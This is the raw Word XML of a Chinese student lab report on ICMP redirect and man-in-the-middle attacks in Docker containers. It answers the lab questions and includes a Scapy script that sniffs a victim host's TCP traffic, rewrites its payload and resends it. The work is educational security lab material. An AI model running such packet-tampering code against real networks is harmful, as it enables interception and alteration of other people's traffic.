      <w:r>
        <w:t>您可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:t>重定向攻击来重定向到同一网络上不存在的机器吗？也就是说，分配给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> icmp.gw </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:t>地址是脱机或不存在的本地计算机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B32E731" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> icmp.gw </w:t>
      </w:r>
      <w:r>
        <w:t>修改为不存在的本地地址</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10.9.0.22,</w:t>
      </w:r>
      <w:r>
        <w:t>结果与第一个问题的实验结果相同，无法重定向。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBEEC9" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="54" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69310AD0" wp14:editId="1978AE39">
                <wp:extent cx="5274564" cy="941832"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4258" name="Group 4258"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5274564" cy="941832"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5274564" cy="941832"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="293" name="Picture 293"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5273040" cy="507492"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="295" name="Picture 295"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="556261"/>
                            <a:ext cx="5274564" cy="385572"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <w:pict>
              <v:group id="Group 4258" style="width:415.32pt;height:74.16pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="52745,9418">
                <v:shape id="Picture 293" style="position:absolute;width:52730;height:5074;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId18"/>
                </v:shape>
                <v:shape id="Picture 295" style="position:absolute;width:52745;height:3855;left:0;top:5562;" filled="f">
                  <v:imagedata r:id="rId19"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="22646BE7" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="295"/>
        <w:ind w:left="370" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>推测由于无法到达该地址，无法作为网关，所以无法重定向。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C34AB" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3:</w:t>
      </w:r>
      <w:r>
        <w:t>如果您查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> docker-compose.yml </w:t>
      </w:r>
      <w:r>
        <w:t>文件，您会发现恶意路由器容器的以下条目。这些条目的目的是什么？请将它们的值更改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:t>，然后再次发起攻击。请描述并解释你的观察。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD3CFD" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="70"/>
        <w:ind w:left="-15" w:right="0" w:firstLine="288"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这些条目的目的是关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:t>重定向。将值修改为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:t>则代表允许发送重定向消息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9B0F2" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
        <w:spacing w:after="53" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="144" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sysctls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF5FCAB" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
        <w:spacing w:after="53" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="122"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>net.ipv4.conf.all.send_redirects=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB1445" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
        <w:spacing w:after="53" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="122"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>net.ipv4.conf.default.send_redirects=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E758757" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
        <w:spacing w:after="186" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:hanging="122"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>net.ipv4.conf.eth0.send_redirects=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5DA37" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="250" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>将以上值改为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，重启容器，进行重定向攻击，发现重定向攻击失败，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50214001" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="73" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45C08052" wp14:editId="0507ABCD">
                <wp:extent cx="5204460" cy="1158240"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4294" name="Group 4294"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5204460" cy="1158240"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5204460" cy="1158240"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="329" name="Picture 329"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5052060" cy="381000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="331" name="Picture 331"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="403860"/>
                            <a:ext cx="5204460" cy="754380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <w:pict>
              <v:group id="Group 4294" style="width:409.8pt;height:91.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="52044,11582">
                <v:shape id="Picture 329" style="position:absolute;width:50520;height:3810;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId22"/>
                </v:shape>
                <v:shape id="Picture 331" style="position:absolute;width:52044;height:7543;left:0;top:4038;" filled="f">
                  <v:imagedata r:id="rId23"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A13FE8" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="-15" w:right="0" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="12567B11" wp14:editId="1ABBF95E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4838701</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6403849" cy="2325624"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="5289" name="Picture 5289"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5289" name="Picture 5289"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6403849" cy="2325624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>这里路由缓存有时候能产生有时候没有产生，但是</w:t>
      </w:r>
      <w:r>
        <w:t>traceroute</w:t>
      </w:r>
      <w:r>
        <w:t>一直没有变化说明重定向攻击失败。这个问题的结果很有意思，关闭恶意路由器重定向功能时我们重定向攻击能够成功，开启发送重定向消息后反而攻击失败了，我开始不是很理解。推测原因可能是允许恶意路由器发送重定向后，它自己又把路由重定向到原来的普通路由器上了，导致重定向失败。我重试一次并用</w:t>
      </w:r>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:r>
        <w:t>抓包后发现恶意路由器确实又发送了重定向消息把路由改回来了，如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D5D15" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:before="88" w:after="789"/>
        <w:ind w:left="250" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>这里又把网关改为原来的网关了，导致重定向攻击失败，推测正确。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6888B223" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2: Launching the MITM Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26DBCE" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>中间人攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB47AC" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:t>docker-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:t>文件内容，改为</w:t>
      </w:r>
      <w:r>
        <w:t>sysctlnet.ipv4.ip_forward=0</w:t>
      </w:r>
      <w:r>
        <w:t>，关闭恶意路由器的</w:t>
      </w:r>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:t>转发，重启容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41898985" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>同</w:t>
      </w:r>
      <w:r>
        <w:t>task1</w:t>
      </w:r>
      <w:r>
        <w:t>操作，对被攻击主机进行</w:t>
      </w:r>
      <w:r>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r>
        <w:t>重定向攻击，这样从被攻击主机到此目的地的所有数据包都将通过恶意路由器进行路由。（这里路由缓存过一段时间就会刷新，刷新后需要再次重定向攻击）然后我们开始进行中间人攻击。在发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> M</w:t>
      </w:r>
      <w:r>
        <w:t>ITM</w:t>
      </w:r>
      <w:r>
        <w:t>攻击之前，我们使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> netcat </w:t>
      </w:r>
      <w:r>
        <w:t>启动一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP</w:t>
      </w:r>
      <w:r>
        <w:t>客户端和服务器程序。在目的容器上执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nc -lp 9090 </w:t>
      </w:r>
      <w:r>
        <w:t>命令，然后在被攻击主机上执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nc 192.168.60.5 9090</w:t>
      </w:r>
      <w:r>
        <w:t>。然后我们在恶意路由器上执行攻击程序，程序如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8179" w:type="dxa"/>
        <w:tblInd w:w="24" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="122" w:type="dxa"/>
          <w:left w:w="149" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8179"/>
      </w:tblGrid>
      <w:tr w:rsidR="00773F28" w14:paraId="018CBBBA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="7272"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8179" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p w14:paraId="546D8CDB" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="156" w:line="469" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="4013" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>#!/usr/bin/env python3 from scapy.all import * print("LAUNCHING MITM ATTACK.........")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C189B9" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="309" w:line="312" w:lineRule="auto"/>
              <w:ind w:left="314" w:right="5259" w:hanging="314"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>def spoof_pkt(pkt): newpkt = IP(bytes(pkt[IP])) de</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>l(newpkt.chksum) del(newpkt[TCP].payload) del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CD41B7" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="56" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="314" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>if pkt[TCP].payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5EFC92" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="0" w:line="315" w:lineRule="auto"/>
              <w:ind w:left="734" w:right="3209" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>data = pkt[TCP].payload.load print("*** %s, length: %d" % (data, len(data)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000C46E2" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="312" w:line="315" w:lineRule="auto"/>
              <w:ind w:left="734" w:right="3924" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t># Replace a pattern newdata = data.replace(b'qiu', b'AAA')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7207F768" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
              <w:ind w:left="314" w:right="4896" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>send(newpkt/newdata) else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36AB5089" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="362" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="734" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>send(newpkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653D73B4" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="3898" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>f = 'tcp and ether host 02:42:0a:09:00:05' pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F0A814D" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="442" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>代码中我们将对报文中的</w:t>
      </w:r>
      <w:r>
        <w:t>“qiu”</w:t>
      </w:r>
      <w:r>
        <w:t>字符串修改为</w:t>
      </w:r>
      <w:r>
        <w:t>“AAA”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F1954" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="7"/>
        <w:ind w:left="-15" w:right="127" w:firstLine="470"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>这里我们对过滤进行了一些修改，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">f = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">'tcp and ether host 02:42:0a:09:00:05' </w:t>
      </w:r>
      <w:r>
        <w:t>可以防止捕获自己发出的报文，我们选择只捕获</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址信息为被攻击主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址的数据包，原因后面会详细讲到。被攻击主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mac </w:t>
      </w:r>
      <w:r>
        <w:t>地址可以通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ifconfig </w:t>
      </w:r>
      <w:r>
        <w:t>语句查看，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B6CE4" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="385A5BD9" wp14:editId="7D825F5B">
            <wp:extent cx="5269992" cy="1208532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269992" cy="1208532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="779D3FF4" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:ind w:left="-15" w:right="0" w:firstLine="314"/>
      </w:pPr>
      <w:r>
        <w:t>执行程序后被攻击主机、目的主机以及恶意路由器输入输出分别如下：被攻击主机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB62FB" w14:textId="77777777" w:rsidR="00773F28" w:rsidRDefault="00C228CC">
      <w:pPr>
        <w:spacing w:after="85" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D9129DC" wp14:editId="14FFA3E2">
            <wp:extent cx="4495800" cy="93726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26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4495800" cy="937260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
